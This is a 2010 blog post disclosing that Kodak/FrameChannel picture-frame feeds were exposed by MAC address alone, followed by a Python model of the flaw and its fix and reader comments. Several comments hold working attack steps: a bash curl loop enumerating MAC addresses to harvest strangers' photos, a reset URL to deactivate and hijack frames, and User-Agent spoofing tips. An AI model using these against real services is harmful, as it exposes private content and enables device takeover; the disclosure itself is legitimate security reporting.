Kodak Easyshare Wireless Picture Frame - How to show everyone what's on your frame

I recently purchased a Kodak Easyshare Wireless Digital Picture Frame off Woot for the amazing price of $49.99. In fact, I bought two. The model number is W820, which is the 8-inch frame; there is also a 10-inch version. These picture frames have built-in WiFi and can grab content off the internet.

The most exciting part about this picture frame has nothing to do with plugging in an SD card full of baby pictures, and everything to do with adding fun widgets to your photo roll: Facebook status updates, Facebook photos, tweets, news, weather, live sports scores, Flickr accounts, and the ability to have it use nearly any RSS feed. Oh, and it shows baby pictures too, I guess, if that's what you want.

The widgets are powered by FrameChannel, a third-party service that provides this functionality to Kodak picture frames everywhere. You set up an account with a secret activation code that is shown on your picture frame (which nobody else is supposed to have access to; otherwise they could load content onto your frame before you even take it out of the box), and then you are off to widget-building land, where you can construct a slideshow based on time of day and frequency of display.

However, deep in the website I noticed this innocent little piece of information:

[Screenshot: Advanced Settings]

What's this at the bottom? Some strange little RSS URL?

Well, let's just plug it in and see what happens:

http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6D

Look, it's an RSS feed of what my picture frame is showing right now! I can send this nice URL to everyone I know so they can look at all the private content I have configured for this device. Note what the URL requires: the frame's MAC address and nothing else. No login, no secret activation code, just an identifier that any other device on the same WiFi network can read out of the frame's traffic. Now, under no circumstances would I recommend changing the last digits of this MAC address frame ID to another number… because you would get someone else's picture frame content. Why would you want to do that?

UPDATE: 1/6/2010 It is quite apparent that FrameChannel is no longer interested in providing the public RSS feature to its customers. As other people have indicated, the RSS URL has been removed from the user interface. In addition, they are now filtering by User-Agent. I am sure that will put an end to the sharing of my frame's RSS feed, because User-Agents are impossible to fake. (The User-Agent header is a string the client chooses to send; anyone who has seen what a frame sends can send the same thing.) No word on whether they intend to update firmware for the "AVOS/1.1"-based device.
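To make the two points above concrete (a feed keyed on a guessable MAC address, then "protected" by a User-Agent check), here is an added example, written for this page and not code from the post, from FrameChannel or from Kodak. It models the server-side feed lookup in three versions: the original MAC-only lookup, the User-Agent-gated lookup, and a hardened lookup keyed on a random per-frame token issued at activation, then runs the same enumeration loop the commenters describe against each. The MAC list, the feed contents, the function names and the assumption that the frame sends "AVOS/1.1" as its User-Agent are all constructed for the example.

```python
"""Toy model of the FrameChannel feed lookup described in the post.

Three versions of the server-side lookup:
  feed_v1 - keyed only on the frame's MAC address (the original design)
  feed_v2 - the same, gated on the frame's User-Agent (the 1/6/2010 fix)
  feed_v3 - keyed on a random per-frame token issued at activation
All data here is constructed for the example; "AVOS/1.1" is assumed to be
the User-Agent the post's "AVOS/1.1"-based device sends. No real frame
or feed is involved and nothing touches the network.
"""
import hmac
import secrets
from typing import Callable, Dict, Optional

# Constructed sample: three activated frames sharing the vendor prefix
# 00:23:4D seen in the post, each with some "private" feed content.
FEEDS_BY_MAC: Dict[str, str] = {
    "00:23:4D:B8:07:6D": "<rss>Casey's Facebook updates and baby photos</rss>",
    "00:23:4D:B8:07:1D": "<rss>a stranger's tweets</rss>",
    "00:23:4D:B8:07:FF": "<rss>Milwaukee weather, two sons' photos</rss>",
}
FRAME_USER_AGENT = "AVOS/1.1"  # assumed frame User-Agent string


def feed_v1(frame_id: str) -> Optional[str]:
    """Original design: the MAC is the only thing the URL carries."""
    return FEEDS_BY_MAC.get(frame_id.upper())


def feed_v2(frame_id: str, user_agent: str) -> Optional[str]:
    """'Fixed' design: same lookup, but only answered to the frame's UA.

    User-Agent is a request header chosen by the client, so this is a
    speed bump, not authentication.
    """
    if user_agent != FRAME_USER_AGENT:
        return None
    return feed_v1(frame_id)


# Hardened design: activation mints an unguessable capability token that
# the frame (and only the frame) embeds in its feed URL.
TOKENS_BY_MAC: Dict[str, str] = {}


def activate(frame_id: str) -> str:
    """Issue a fresh 256-bit token for the frame (shown once, at activation)."""
    token = secrets.token_urlsafe(32)
    TOKENS_BY_MAC[frame_id.upper()] = token
    return token


def feed_v3(frame_id: str, token: str) -> Optional[str]:
    """Hardened lookup: the MAC alone is worthless without its token."""
    expected = TOKENS_BY_MAC.get(frame_id.upper())
    if expected is None or not hmac.compare_digest(expected, token):
        return None
    return FEEDS_BY_MAC.get(frame_id.upper())


def sweep_last_byte(fetch: Callable[[str], Optional[str]],
                    prefix: str = "00:23:4D:B8:07") -> Dict[str, str]:
    """Enumerate the last byte of a MAC prefix and keep every feed returned.

    This is the loop from the comments' bash script, shrunk to one byte;
    a full OUI is 2**24 candidates, which is the same loop run longer.
    """
    hits: Dict[str, str] = {}
    for last in range(0x100):
        mac = f"{prefix}:{last:02X}"
        feed = fetch(mac)
        if feed is not None:
            hits[mac] = feed
    return hits


def attacker_results() -> Dict[str, int]:
    """How many strangers' feeds an attacker with no credentials can pull."""
    spoofed_ua = FRAME_USER_AGENT  # attacker copies the sniffed frame UA
    return {
        "v1_no_auth": len(sweep_last_byte(feed_v1)),
        "v2_browser_ua": len(sweep_last_byte(lambda m: feed_v2(m, "Mozilla/5.0"))),
        "v2_spoofed_ua": len(sweep_last_byte(lambda m: feed_v2(m, spoofed_ua))),
        "v3_guessed_token": len(sweep_last_byte(lambda m: feed_v3(m, "guess"))),
    }


if __name__ == "__main__":
    for mac in FEEDS_BY_MAC:
        activate(mac)
    print(attacker_results())
```

The sweep returns all three feeds against v1, none against v2 from a browser, all three again against v2 once the attacker sends the frame's User-Agent, and none against v3, where the per-frame secret is 256 random bits rather than 24 bits of serial number behind a public vendor prefix. The comparison in feed_v3 uses hmac.compare_digest so the check does not leak timing information about the token.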

Slashdot has called this feature, which was documented right in the web interface, a "major privacy/security issue", and some discussion has ensued there: http://yro.slashdot.org/story/10/01/05/0413228/Kodak-Wireless-Picture-Frames-Open-To-Public.

UPDATE: 6/21/2011 Regretfully, FrameChannel has informed its users that their year-old WiFi internet-connected picture frame is now completely obsolete. With all these initiatives to put everything in the cloud, I am sure we will see more of this crap.

Yeah, ‘due to the economy’, I may not be able to afford to store the kilobytes this blog post contains much longer. Maybe their economic challenges rest in the fact that there was no business model to begin with.

83 Responses to "Kodak Easyshare Wireless Picture Frame - How to show everyone what's on your frame"

  1. John says:

    Don't forget that the first 6 nibbles of the MAC address (3 bytes, the first 3 hex digits) will always be the same, just change the last 3 bytes. It would be trivial to write a script that did just this and returned which ones were valid URLs just based on the HTTP response code.

  2. Social comments and analytics for this post…

    This post was mentioned on Twitter by ry_jones: own a Kodak EasyShare frame? Might want to read this: your content is public. http://seattlewireless.net/~casey/?p=13...

  3. HKN says:

    Slashdot is coming!

    (counter is now 945)

  4. [...] Each frame’s URL is identical except for a parameter matching its particular MAC address, enabling public browsing of users’ feeds. And worse, if you reach the feed of a not-yet-activated frame, it gives you the code to activate [...]

  5. joker says:

    So… it looks like one could use this URL pattern to locate an unactivated frame and, as a courtesy to the purchaser, “pre-load” some pictures for them onto their frame?

    Wouldn’t that be a bit of a shock to granny when she unwraps the gift??

  6. joepress says:

    Better yet change one of the first three hex digits and you still get to create your own feed, it just won’t link up to a frame. COOL

  7. mike says:

    It's even worse than you think. After reading your post I discovered that you can reset the key on arbitrary accounts… easily…

    Let's just say "reset=1" was not the brightest choice.

  8. WizKid says:

    The activation image URL also contains the MAC. And there is a parameter called reset=0. If reset=0 and I load the URL for a MAC that is activated, I get "activation successful". But if I change to reset=1 I get an activation code. I haven't tested if that activation code works. But I wouldn't be surprised if it is possible to reset someone's frame.

  9. Bob says:

    Well, Kodak *does* call it EasyShare…..

  10. How nice that Kodak has made so Easy for you to ‘Share’, whether you want to or not.

  11. HappyHax0r says:

    It would seem that you don’t get much easier sharing than that? :)

  12. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone whats on your frame « Casey Hal…. [...]

  13. Shawn says:

    Ah, this was just slashdotted. I am sorry, but you're screwed if you were thinking this was secure and safe in any way!!

  14. Otto says:

    Don’t be too sure about the first three bytes of the MAC address not changing.

    I got two of these picture frames from Woot. Both Kodak. Both of them have characters other than the ones he posted in the link above.

    So, fiddling around with the real prefix, it took me a dozen tries before I found somebody else’s active feed. I know that this person lives in Milwaukee based on their weather feed. I know that they have two sons.

    One thing to keep in mind is that the photos that these things display tend to already be public. The Picasa connector only works with public photo albums. The Flickr connector has the same story. The Facebook connector can show private albums if you set it to do so, since it uses Facebook Connect to authenticate, but most of the others only work with public photos.

  15. Rob Weir says:

    I tried a few MAC addresses and soon found one that said:

    “This frame has been preactivated” and gave the username and password and invited the user to login to framechannel.com to upload their own content.

    So it appears that not only can one view their pictures, anyone also has public write access to their frame.

  16. Mike says:

    You can also deactivate frames by visiting
    http://www.framechannel.com/feeds/pair/index.php/r=1/frameModelCode=KD9371/frameModelId=1/frameId=whatever/reset=0/language=en

    You can then reactivate them and load them with whatever images you want.

    So Kodak has essentially built a system for letting complete strangers (a) browse your family photos, and (b) beam shock porn directly into your living-room?

  17. Mike says:

    Sorry, in the URL in my post the 'reset=0' should've been 'reset=1'.

  18. [...] there’s a problem with the Kodak Easyshare Wireless Picture [...]

  19. Johnny says:

    ….and the article is now also linked to Slashdot as well.

  20. [...] to a blog post by Casey Halverson, the wireless picture frame contents comes from a findable URL. It wouldn’t take a lot of technology to build software to search for the contents of other [...]

  21. illumin8 says:

    actually, changing 00:32 to 00:33 reveals a batch of unsold units. complete with activation codes.

  22. someone says:

    I’m pretty sure the fun has already started….

    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:1D

  23. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone whats on your frame « Casey Hal…. [...]

  24. Ken says:

    I guess it’s really an Easy Share… you can share your pictures and access to your account with the world, effortlessly.

  25. Brian says:

    Problem with the HTTP response: it seems they are all valid. You would have to trigger on something else, should such a script be wanted.

    so this works
    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6D
    as does this
    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6z

  26. Parker says:

    This goes way beyond reasonable expectations of the vendor. Even the slightest interest in security/privacy would have prevented this. It’s entirely unforgivable. Lawsuit material.

    Has anyone notified Kodak or Framechannel.com? Looks like you have to create an account on framechannel.com to contact them. Maybe you should drop an email to
    info@framemedia.com

    $ whois framechannel.com

    Domain name: framechannel.com

    Administrative Contact:
    Frame Media, Inc.
    Alan Phillips (info@framemedia.com)
    +1.7812353006
    Fax:
    40 Washington St
    Wellesley, MA 02481
    US

  27. Joakim says:

    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:FF
    lol, now I really don’t imagine someone would put nude pictures of themselves on these… but Kodak and FrameChannel really have a privacy problem now and should be ashamed.

  28. Captain Obvious says:

    Two words: "Easy" "Share". It's in the title; why is everyone surprised? Good find though!

  29. Rick says:

    Your frame feed has the Slashdot summary that sent me here. If only the frame supported hyperlinks, you could complete the loop.

  30. Anonymous Coward says:

    Now, if it only had a built-in webcam… we’d really have something!

  31. tester says:

    Have fun.

    #!/bin/bash
    # Sweep 00:23:4D:XX:YY:ZZ, XX from 0xB8 (184) upwards, and collect the
    # jpg URLs each frame's feed returns into imagelist.txt.

    for (( a=184; a<=255; a++ )); do
        place1=$(printf '%02X' "$a")
        echo "first place $place1"

        for (( b=1; b<=255; b++ )); do
            place2=$(printf '%02X' "$b")
            echo " second place $place2"

            for (( c=1; c<=255; c++ )); do
                place3=$(printf '%02X' "$c")
                curl -s "http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:$place1:$place2:$place3" \
                    | grep jpg | grep media | cut -d'"' -f2 >> imagelist.txt
                echo " Grabbing frameId=00:23:4D:$place1:$place2:$place3 "
            done
        done
    done

  32. tester says:

    curl -s "http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:$place1:$place2:$place3" | grep jpg | grep media | cut -d'"' -f2 >> imagelist.txt

  33. OBCENEIKON says:

    Did they already take it offline? It seems all MACs are now showing the default image.

  34. Ed says:

    Thank you for this post and information in the comments.
    We were literally setting one of these up today,
    for children/grandparents.

    Nice catch.

  35. AdaIsDead says:

    Looks like they are all on the National Geographic plants feed now; glad someone stepped in…

  36. Jim says:

    It appears that FrameChannel is used by almost 2 dozen other digital picture frame vendors. Does anyone have experience with other similar products to know if they use the same RSS scheme and are equally vulnerable?

  37. JohnH says:

    I imagine all they have done is always give the default feed to any request whose User-Agent header doesn't match the frame software's user agent. If someone were to hook up a network sniffer and check a real frame's HTTP request, and then set their user agent on their browser, I think you would once again see photos you are not supposed to see.

  38. Tester2 says:

    where did tester’s script go?! cease and desist order? :)

  39. [...] pictures of their choosing on it – even before it gets out of the box. Read the original post here. Kodak, you need to think the security implications of a wifi-enabled digital picture frame before [...]

  40. duncan says:

    All the URLs that are posted are all default pics, even the one someone said was NSFW. Could it be that they’ve taken action already?

  41. electronbee says:

    They are all saying forbidden now. I guess someone got around to pay attention!

  42. yyxy says:

    JohnH is almost certainly correct. Anyone willing to share a pcap?

  43. Jason! says:

    Since they’re not asking for a password, what are the odds they’re just checking the user agent string?

  44. KioskGuy says:

    Dang, I missed the fun. But this blog and those who were hacking the screens did the community a favor. A few days of foolishness has prompted Kodak and its vendors to take a closer look at the weakness of their programming team. Kudos. If they won't do the QA work themselves, they can always crowdsource it.

  45. JohnH says:

    Did someone look to see what User-Agent string was being used by picture frames?

  46. KD9371 is dead says:

    So try some other product IDs. It looks like the quick and dirty hack was to disable product ID KD9371. Ultra-lame.

  47. Jeff says:

    That’s what I was thinking… anyone want to publish the frame browser’s user agent?

  48. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone … [...]
